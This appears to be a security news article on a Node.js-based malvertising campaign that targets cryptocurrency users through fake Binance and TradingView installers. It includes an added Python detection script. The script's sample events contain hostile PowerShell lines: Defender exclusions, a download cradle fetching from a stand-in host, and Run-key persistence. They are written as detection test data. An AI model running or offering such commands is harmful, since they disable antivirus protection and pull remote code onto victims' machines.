In a recent cybersecurity development, Microsoft has identified an ongoing malvertising campaign that exploits the Node.js platform to distribute malicious payloads aimed at stealing sensitive information from cryptocurrency users. This campaign, first detected in October 2024, employs deceptive tactics to lure individuals into downloading and installing counterfeit versions of popular cryptocurrency trading applications, specifically Binance and TradingView.
Deceptive Distribution Tactics
The attackers initiate their scheme by creating fraudulent websites that closely mimic the legitimate platforms of Binance and TradingView. Unsuspecting users, seeking to download these applications, are redirected to these counterfeit sites through malicious advertisements or phishing emails. Once on the fake site, users are prompted to download an installer that appears authentic but is embedded with a malicious dynamic-link library (DLL) named CustomActions.dll.
Execution and Persistence Mechanisms
Upon execution, the malicious installer performs several actions to establish a foothold on the victim’s system:
1. System Information Harvesting: The embedded DLL utilizes Windows Management Instrumentation (WMI) to collect basic system information, including operating system details, hardware specifications, and installed applications.
2. Persistence Establishment: To ensure continued access, the malware sets up a scheduled task that triggers the execution of PowerShell commands at regular intervals. This scheduled task is designed to maintain the malware’s presence on the system even after reboots.
3. User Deception: To avoid raising suspicion, the DLL launches a browser window displaying the legitimate Binance or TradingView website. This is achieved using msedge_proxy.exe, a Microsoft Edge component that can display any website as a web application, thereby convincing the user that the installation was successful and legitimate.
Advanced Evasion Techniques
The malware employs sophisticated methods to evade detection by security software:
– Defender Exclusion: The scheduled task executes PowerShell commands that add exclusions to Microsoft Defender for Endpoint, specifically targeting the running PowerShell process and the current directory. This tactic prevents the security software from scanning and detecting the malicious activities.
– Obfuscated PowerShell Commands: The malware downloads and executes obfuscated PowerShell scripts from remote servers. These scripts are designed to gather extensive information about the operating system, BIOS, hardware, and installed applications. The collected data is then converted into JSON format and transmitted to the attacker’s command-and-control (C2) server via HTTPS POST requests.
Node.js Exploitation for Malicious Payload Delivery
A critical aspect of this campaign is the use of Node.js, an open-source, cross-platform JavaScript runtime environment. The attack chain progresses as follows:
1. Node.js Deployment: The malware downloads an archive file from the C2 server containing the Node.js runtime binary and a JavaScript compiled (JSC) file.
2. Execution of Malicious JavaScript: The Node.js executable initiates the execution of the JSC file, which establishes network connections and is likely designed to exfiltrate sensitive browser information, such as saved credentials and cookies.
In an alternative infection sequence observed by Microsoft, the attackers employ a technique known as ClickFix. This method involves the inline execution of JavaScript code using malicious PowerShell commands. Instead of downloading the Node.js binary and JSC file, the malware directly executes JavaScript code that performs network discovery activities to identify high-value assets within the victim’s network. Additionally, it disguises C2 traffic as legitimate Cloudflare activity to evade detection and gains persistence by modifying Windows Registry run keys.
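The behaviours described in the two sections above (Defender exclusions and download cradles launched from a scheduled task, a Node.js binary executing a JSC file from a user-writable directory, Run-key persistence, and the msedge_proxy.exe web-app window spawned by the installer) are each observable in process-creation telemetry. The following is an added example, written for this page and not Microsoft's detection logic, that runs a few such rules over a constructed stream of JSON-lines process events; the field names (`Image`, `ParentImage`, `CommandLine`), the paths and the `c2.example.invalid` host are constructed sample data, and real Sysmon or EDR records carry the same information under their own field names.

```python
"""Detection sketch for the campaign behaviours described above.
Added example, not Microsoft's own logic; input is constructed telemetry."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass
from typing import Callable, Iterable

# Constructed sample events (JSON lines). Events 1 and 6 are benign controls.
SAMPLE_EVENTS = r"""
{"id": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -Command Get-Process"}
{"id": 2, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command \"Add-MpPreference -ExclusionProcess 'powershell.exe'; Add-MpPreference -ExclusionPath 'C:\\Users\\victim\\AppData\\Local\\Temp'\""}
{"id": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/s.ps1')\""}
{"id": 4, "Image": "C:\\Users\\victim\\AppData\\Local\\Temp\\node.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "node.exe C:\\Users\\victim\\AppData\\Local\\Temp\\app.jsc"}
{"id": 5, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d \"powershell -w hidden -File C:\\Users\\victim\\AppData\\Local\\Temp\\u.ps1\""}
{"id": 6, "Image": "C:\\Program Files\\nodejs\\node.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "node.exe server.js"}
{"id": 7, "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe", "ParentImage": "C:\\Users\\victim\\Downloads\\TradingView-Setup.exe", "CommandLine": "msedge_proxy.exe --app=https://www.tradingview.com/"}
"""

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Cmdlets/aliases commonly used to fetch or inline-execute remote script.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|-enc(odedcommand)?\b",
    re.I)
USER_WRITABLE_DIR = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    severity: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defender_exclusion(ev: dict) -> bool:
    # PowerShell adding a Defender exclusion for a path, process or extension.
    return basename(ev["Image"]) in POWERSHELL and bool(
        re.search(r"add-mppreference\s+-exclusion(path|process|extension)", ev["CommandLine"], re.I))


def scheduled_download_cradle(ev: dict) -> bool:
    # PowerShell spawned by the Task Scheduler service host with a download cradle.
    return (basename(ev["Image"]) in POWERSHELL
            and basename(ev["ParentImage"]) in {"svchost.exe", "taskhostw.exe"}
            and bool(DOWNLOAD_CRADLE.search(ev["CommandLine"])))


def node_jsc_from_user_dir(ev: dict) -> bool:
    # node.exe executing a compiled JSC file, or running out of a user-writable directory.
    return basename(ev["Image"]) == "node.exe" and (
        bool(re.search(r"\.jsc\b", ev["CommandLine"], re.I))
        or bool(USER_WRITABLE_DIR.search(ev["Image"])))


def run_key_persistence(ev: dict) -> bool:
    # reg.exe or PowerShell writing to a CurrentVersion\Run key.
    return basename(ev["Image"]) in POWERSHELL | {"reg.exe"} and bool(
        re.search(r"currentversion\\run", ev["CommandLine"], re.I))


def web_app_from_installer(ev: dict) -> bool:
    # Edge web-app window launched by something other than Edge or the shell.
    return (basename(ev["Image"]) == "msedge_proxy.exe"
            and "--app=" in ev["CommandLine"].lower()
            and basename(ev["ParentImage"]) not in {"msedge.exe", "explorer.exe"})


RULES: list[tuple[str, str, Callable[[dict], bool]]] = [
    ("defender_exclusion_added", "high", defender_exclusion),
    ("scheduled_task_download_cradle", "high", scheduled_download_cradle),
    ("node_jsc_user_dir", "high", node_jsc_from_user_dir),
    ("run_key_persistence", "medium", run_key_persistence),
    ("edge_webapp_from_installer", "low", web_app_from_installer),
]


def parse_events(jsonl: str) -> list[dict]:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def scan(events: Iterable[dict]) -> list[Finding]:
    """Apply every rule to every event; one Finding per (event, matching rule)."""
    return [Finding(ev["id"], name, sev) for ev in events for name, sev, pred in RULES if pred(ev)]


if __name__ == "__main__":
    for f in scan(parse_events(SAMPLE_EVENTS)):
        print(f"event {f.event_id}: {f.rule} [{f.severity}]")
```

The rules are deliberately narrow, which is why the benign controls (an interactive `Get-Process`, a Node.js server started from `Program Files`) produce nothing; in production the same logic would be expressed as a SIEM or EDR query over the real event schema, and the exclusion rule in particular is worth pairing with a periodic review of the configured Defender exclusions themselves, since the PowerShell that added them may have run before logging was enabled.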
Implications and Recommendations
The exploitation of Node.js in this campaign underscores the evolving tactics of cybercriminals who leverage trusted platforms to deliver malware. Node.js’s widespread use and cross-platform capabilities make it an attractive tool for attackers aiming to blend malicious activities with legitimate applications, thereby bypassing conventional security controls.
To mitigate the risks associated with such sophisticated attacks, users and organizations are advised to:
– Verify Software Sources: Always download software from official and reputable sources. Be cautious of links provided through unsolicited emails or advertisements.
– Maintain Updated Security Software: Ensure that antivirus and anti-malware solutions are up to date to detect and prevent the execution of malicious scripts and binaries.
– Exercise Caution with PowerShell Scripts: Be wary of executing PowerShell commands or scripts from untrusted sources, as they can be used to deploy malware or alter system configurations maliciously.
– Monitor System Activities: Regularly review system logs and scheduled tasks for any unauthorized or suspicious activities that could indicate a compromise.
By adopting these proactive measures, users can enhance their defenses against malvertising campaigns and other cyber threats that exploit legitimate platforms for malicious purposes.